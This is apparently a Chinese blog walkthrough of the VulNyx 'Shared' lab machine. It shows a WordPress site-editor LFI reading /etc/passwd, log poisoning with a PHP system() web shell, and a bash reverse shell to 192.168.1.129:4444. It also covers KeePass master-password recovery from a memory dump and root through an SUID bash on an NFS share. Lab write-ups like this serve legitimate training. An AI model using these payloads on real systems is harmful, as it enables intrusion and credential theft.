靶场练习-vulnyx：Shared - Medium - VulNyx - 靶场练习 | 🎐清风. = 劈开深海，填入我的山🍂

# 靶场搭建

下载：Shared

Nat，IP： 192.168.1.151

	PORT STATE SERVICE VERSION
	22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
	\| ssh-hostkey:
	\| 256 9d:c2:e5:b9:bc:86:d4:81:5e:ad:aa:8d:87:a8:ad:5b (ECDSA)
	\|_ 256 6a:d1:8a:c1:4d:f9:0c:4f:c5:f6:21:bb:c9:a6:24:53 (ED25519)
	80/tcp open http Apache httpd 2.4.57 ((Debian))
	\|_http-title: Apache2 Debian Default Page: It works
	\|_http-server-header: Apache/2.4.57 (Debian)
	111/tcp open rpcbind 2-4 (RPC #100000)
	\| rpcinfo:
	\| program version port/proto service
	\| 100000 2,3,4 111/tcp rpcbind
	\| 100000 2,3,4 111/udp rpcbind
	\| 100000 3,4 111/tcp6 rpcbind
	\| 100000 3,4 111/udp6 rpcbind
	\| 100003 3,4 2049/tcp nfs
	\| 100003 3,4 2049/tcp6 nfs
	\| 100005 1,2,3 38823/udp6 mountd
	\| 100005 1,2,3 43065/udp mountd
	\| 100005 1,2,3 48895/tcp mountd
	\| 100005 1,2,3 60637/tcp6 mountd
	\| 100021 1,3,4 40091/tcp nlockmgr
	\| 100021 1,3,4 41415/tcp6 nlockmgr
	\| 100021 1,3,4 48071/udp6 nlockmgr
	\| 100021 1,3,4 50189/udp nlockmgr
	\| 100024 1 36161/udp status
	\| 100024 1 54047/udp6 status
	\| 100024 1 56771/tcp6 status
	\| 100024 1 58261/tcp status
	\| 100227 3 2049/tcp nfs_acl
	\|_ 100227 3 2049/tcp6 nfs_acl
	2049/tcp open nfs_acl 3 (RPC #100227)
	39071/tcp open mountd 1-3 (RPC #100005)
	40091/tcp open nlockmgr 1-4 (RPC #100021)
	48063/tcp open mountd 1-3 (RPC #100005)
	48895/tcp open mountd 1-3 (RPC #100005)
	58261/tcp open status 1 (RPC #100024)

dirb 扫出来 wordpress 目录，是个 wordpress 的站

wpscan 扫一下发现 site-editor 插件。搜到了漏洞，LFI

	┌──(root㉿kali)-[~]
	└─# curl "http://shared.nyx/wordpress/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd"
	root:x:0:0:root:/root:/bin/bash
	daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
	bin:x:2:2:bin:/bin:/usr/sbin/nologin
	sys:x:3:3:sys:/dev:/usr/sbin/nologin
	sync:x:4:65534:sync:/bin:/bin/sync
	games:x:5:60:games:/usr/games:/usr/sbin/nologin
	man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
	lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
	mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
	news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
	uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
	proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
	www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
	backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
	list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
	irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
	_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
	nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
	systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
	messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
	sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
	jackondor:x:1001:1001::/home/jackondor:/bin/bash
	_rpc:x:102:65534::/run/rpcbind:/usr/sbin/nologin
	statd:x:103:65534::/var/lib/nfs:/usr/sbin/nologin
	mysql:x:104:110:MySQL Server,,,:/nonexistent:/bin/false
	j4ckie:x:1002:1002::/home/j4ckie:/bin/sh
	condor:x:1003:1003::/home/condor:/bin/sh
	{"success":true,"data":{"output":[]}}

包含日志，直接弹 shell：

	┌──(root㉿kali)-[~]
	└─# curl "http://shared.nyx/wordpress/" -H "User-Agent: <?php system(\$_GET['shell']); ?>"


	┌──(root㉿kali)-[~]
	└─# curl "http://shared.nyx/wordpress/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/log/apache2/access.log&shell=bash+-c+%22bash+-i+%3e%26+%2fdev%2ftcp%2f192.168.1.129%2f4444+0%3e%261%22"

翻一下目录，找到了 wordpress 数据库的密码

	23 /** The name of the database for WordPress */
	24 define( 'DB_NAME', 'wordpress' );
	25
	26 /** Database username */
	27 define( 'DB_USER', 'wordpress' );
	28
	29 /** Database password */
	30 define( 'DB_PASSWORD', 'R9o17ONkbFk2BrRHG7zY' );
	31
	32 /** Database hostname */
	33 define( 'DB_HOST', 'localhost' );
	34
	35 /** Database charset to use in creating database tables. */
	36 define( 'DB_CHARSET', 'utf8' );
	37
	38 /** The database collate type. Don't change this if in doubt. */
	39 define( 'DB_COLLATE', '' );

无用，遗憾

又翻到了 backup 文件夹，zip 拿到本机，解压发现 keepass

有 DMP 文件，破解

	git clone https://github.com/Orange-Cyberdefense/KeePwn
	cd KeePwn
	sudo python3 setup.py install
	KeePwn --help

	┌──(root㉿kali)-[~/111/EMP41111/KeePwn]
	└─# KeePwn parse_dump --dump_file ../KeePass.DMP --bruteforce ../sharedbbdd.kdbx
	KeePwn v0.4 - by Julien BEDEL (@d3lb3_)

	[*] Searching for the master password in memory dump.. done!
	[*] Found 19 candidates:
	＿hared123%
	＿)ared123%
	＿Ïared123%
	＿\ared123%
	＿ñared123%
	＿Dared123%
	＿§ared123%
	＿#ared123%
	＿yared123%
	＿kared123%
	＿9ared123%
	＿;ared123%
	＿Hared123%
	＿5ared123%
	＿-ared123%
	＿Bared123%
	＿qared123%
	＿aared123%
	＿'ared123%

	[*] Bruteforcing missing symbol with the 254 most common unicode characters.. done!
	[+] sharedbbdd.kdbx successfully unlocked using master password Shared123%

得到密码： Shared123%

看到了 jackondor 的密码 7iwylOTHddtPakkgTJV9

登录拿到 shell

NFS 在 /shared/tmp

直接挂载到本地，传一个 bash 上去：

	┌──(root㉿kali)-[~]
	└─# mkdir /tmp/privesc

	┌──(root㉿kali)-[~]
	└─# mount -t nfs 192.168.1.151:/shared/tmp /tmp/privesc

	┌──(root㉿kali)-[~]
	└─# cd /tmp/privesc

	┌──(root㉿kali)-[/tmp/privesc]
	└─# cp /bin/bash .

	┌──(root㉿kali)-[/tmp/privesc]
	└─# chmod +s bash

ssh 终端直接运行

	jackondor@shared:~$ cd /shared/tmp/
	jackondor@shared:/shared/tmp$ ./bash -p
	bash-5.2# cat /root/root.txt
	8e03a0a039069f840196498da1750f1e

OK 了家人，拿到了 root 权限